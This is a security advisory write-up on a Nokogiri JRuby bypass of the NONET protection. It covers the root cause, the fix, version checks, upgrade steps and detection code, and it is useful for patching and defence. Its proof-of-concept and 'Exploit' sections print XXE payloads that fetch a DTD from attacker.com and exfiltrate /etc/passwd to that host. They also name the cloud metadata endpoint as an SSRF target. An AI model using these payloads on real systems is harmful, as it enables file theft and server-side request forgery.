Nokogiri JRuby NONET Bypass (GHSA-8678-w3jw-xfc2) -DC-Jun2026-483


The `NONET` parse option, which Nokogiri enables by default for `Nokogiri::XML::Schema` as a security measure (originally introduced to address CVE-2020-26247), was not correctly enforced on the JRuby implementation. This meant that even when `NONET` was set, a schema parsed with default options could still fetch external resources over the network, potentially enabling Server-Side Request Forgery (SSRF) or XML External Entity (XXE) attacks.
The root cause lies in the scheme-blocking mechanism used by JRuby. Prior to version 1.19.4, Nokogiri on JRuby employed a denylist of network schemes. However, this denylist was case-sensitive and incomplete, allowing attackers to bypass it using alternative case variations or less common URI schemes. CRuby was never affected because libxml2’s `xmlNoNetExternalEntityLoader` blocks all network schemes at the I/O layer, regardless of scheme or case, making it impervious to such bypasses.
Nokogiri 1.19.4 remediates this by replacing the denylist with an allowlist. When `NONET` is enabled, only local resources are resolved: the `file:` scheme, or relative/absolute paths with no scheme. Every network scheme (e.g., `http://`, `https://`, `ftp://`, etc.) is blocked case-insensitively. This brings JRuby behavior fully in line with CRuby, closing the bypass vector.
The vulnerability is a bypass of CVE-2020-26247 and has been assessed as low severity (CVSS 2.6, CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:N). It was responsibly reported by @bilerden.
<h2 style="color: blue;">DailyCVE Form</h2>

| Field | Value |
|---|---|
| Platform | Nokogiri (JRuby) |
| Version | < 1.19.4 |
| Vulnerability | XXE/SSRF via NONET bypass |
| Severity | Low (CVSS 2.6) |
| Date | 2026-06-18 |
| Prediction | Patch already released (2026-06-18) |
<h2 style="color: blue;">What Undercode Say: Analytics & Verification</h2>
<h2 style="color: blue;">Version Check</h2>

```bash
# Check installed Nokogiri version
gem list nokogiri
# Or via Bundler
bundle show nokogiri
# Print the loaded version; vulnerable if < 1.19.4
ruby -e "require 'nokogiri'; puts Nokogiri::VERSION"
```

<h2 style="color: blue;">Proof of Concept (JRuby Only)</h2>
The following demonstrates the vulnerability on JRuby prior to 1.19.4:

```ruby
require 'nokogiri'

# Malicious schema that attempts to load an external DTD
malicious_schema = <<~XML
  <?xml version="1.0"?>
  <!DOCTYPE schema [
    <!ENTITY % ext SYSTEM "http://attacker.com/evil.dtd">
    %ext;
  ]>
  <xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
    <xs:element name="root" type="xs:string"/>
  </xs:schema>
XML

# Default parse options have NONET enabled, but on JRuby < 1.19.4 it is bypassed
schema = Nokogiri::XML::Schema(malicious_schema)
# On vulnerable JRuby, this will fetch http://attacker.com/evil.dtd
```

<h2 style="color: blue;">Verification After Patch</h2>

```ruby
require 'nokogiri'

# malicious_schema is the same heredoc defined in the proof of concept above
# On JRuby 1.19.4+, this will raise an error or silently fail to fetch
schema = Nokogiri::XML::Schema(malicious_schema)
# Network requests are now blocked as intended
```

<h2 style="color: blue;">Allowlist Behavior (1.19.4+)</h2>

```ruby
# Local file: allowed
schema = Nokogiri::XML::Schema(File.read("local.xsd"))

# Network locations referenced from inside a schema (here via xs:include) are blocked, case-insensitively.
# Nokogiri::XML::Schema() takes schema XML, not a URL, so the network reference has to sit inside the document.
include_from = ->(loc) { %(<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema"><xs:include schemaLocation="#{loc}"/></xs:schema>) }
schema = Nokogiri::XML::Schema(include_from.call('http://example.com/schema.xsd'))  # blocked
schema = Nokogiri::XML::Schema(include_from.call('HTTP://example.com/schema.xsd'))  # also blocked
```
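As an added example (not Nokogiri's own code), the following models the two scheme policies contrasted above, the pre-1.19.4 case-sensitive denylist and the 1.19.4 allowlist, and runs both over constructed schemaLocation values so the bypass surface the allowlist closes can be checked offline. `DENIED_SCHEMES` is an assumed illustrative list, not the exact list the old JRuby resolver carried.

```ruby
# Added example (not Nokogiri's own code): a minimal model of the two resolver
# policies the advisory contrasts. DENIED_SCHEMES is an assumed illustration
# of a case-sensitive, incomplete denylist, not the real pre-1.19.4 list.
DENIED_SCHEMES = %w[http https ftp].freeze

# Extract the URI scheme (RFC 3986 syntax) from a schemaLocation or SYSTEM id.
# Returns nil for scheme-less relative or absolute paths.
def uri_scheme(location)
  location[/\A([A-Za-z][A-Za-z0-9+.\-]*):/, 1]
end

# Pre-1.19.4 JRuby behaviour: block only exact, case-sensitive matches.
def denylist_allows?(location)
  scheme = uri_scheme(location)
  scheme.nil? || !DENIED_SCHEMES.include?(scheme)
end

# 1.19.4 behaviour: only file: (any case) or scheme-less paths may resolve.
def allowlist_allows?(location)
  scheme = uri_scheme(location)
  scheme.nil? || scheme.casecmp?("file")
end

# Locations the old policy lets through but the new one blocks, i.e. the
# bypass surface that the allowlist closes.
def denylist_bypasses(locations)
  locations.select { |l| denylist_allows?(l) && !allowlist_allows?(l) }
end

# Constructed sample schemaLocation values (nothing is actually fetched).
SAMPLE_LOCATIONS = [
  "types.xsd",                          # relative path: allowed by both
  "/opt/app/schemas/types.xsd",         # absolute path: allowed by both
  "file:///opt/app/schemas/types.xsd",  # file scheme: allowed by both
  "http://example.com/types.xsd",       # listed scheme: blocked by both
  "HTTP://example.com/types.xsd",       # case variant: slips past the denylist
  "gopher://example.com/types.xsd",     # unlisted scheme: slips past the denylist
].freeze

if __FILE__ == $PROGRAM_NAME
  SAMPLE_LOCATIONS.each do |loc|
    printf("%-38s denylist=%-5s allowlist=%s\n", loc,
           denylist_allows?(loc), allowlist_allows?(loc))
  end
end
```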

<h2 style="color: blue;">Exploit</h2>
An attacker can exploit this vulnerability by providing a crafted XML Schema that includes external entity references pointing to attacker‑controlled resources. When parsed on a vulnerable JRuby instance, the schema will fetch those external resources, enabling:
- SSRF: The attacker can make the server issue requests to internal networks (e.g., `http://169.254.169.254/latest/meta-data/` on AWS) or other restricted endpoints.
- XXE: The attacker can read local files (via `file:///etc/passwd`) or trigger denial-of-service via recursive entity expansion.

Example XXE payload:

```xml
<?xml version="1.0"?>
<!DOCTYPE schema [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/?%file;'>">
  %eval;
  %exfil;
]>
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
  <xs:element name="root" type="xs:string"/>
</xs:schema>
```

On vulnerable JRuby, this would exfiltrate `/etc/passwd` to the attacker’s server.

Protection

1. Upgrade to Nokogiri 1.19.4 or later

```bash
gem update nokogiri
```

Or pin it in the Gemfile and update:

```ruby
gem 'nokogiri', '>= 1.19.4'
```

```bash
bundle update nokogiri
```

2. If Upgrading Is Not Immediately Possible

There are no known workarounds for affected versions. However, if you absolutely must use an older version and fully trust the schema input, you can explicitly disable `NONET` (but this re‑enables the very risk the flag was meant to prevent):

```ruby
# ONLY for trusted input: do NOT use with untrusted data
schema = Nokogiri::XML::Schema.new(
  trusted_schema,
  Nokogiri::XML::ParseOptions.new.nononet  # disables NONET
)
```

Warning: This should only be done when the schema source is completely trusted and cannot be tampered with.

3. Runtime Detection (JRuby)

To detect if your JRuby environment is vulnerable:

```ruby
require 'nokogiri'

# Compare as versions, not strings: as strings, '1.9.0' < '1.19.4' is false, so 1.9.x would be missed
if defined?(JRUBY_VERSION) && Gem::Version.new(Nokogiri::VERSION) < Gem::Version.new('1.19.4')
  puts "WARNING: Vulnerable to GHSA-8678-w3jw-xfc2"
end
```

Impact

| Aspect | Details |
|---|---|
| Confidentiality | Low – Attacker may read local files or internal network responses (SSRF) |
| Integrity | None – No data modification possible |
| Availability | None – No direct DoS impact |
| Attack Vector | Network – Attacker supplies malicious XML Schema |
| Attack Complexity | High – Requires crafted schema and specific JRuby environment |
| Privileges Required | Low – Attacker needs to supply input to the parser |
| User Interaction | Required – Victim must parse the attacker-supplied schema |
| Scope | Unchanged – Exploitation does not affect other components |

Real‑world scenarios:

  • A Ruby web application running on JRuby that validates user‑supplied XML Schemas.
  • Any service that uses `Nokogiri::XML::Schema` with default options on JRuby.


Sources:

Reported By: github.com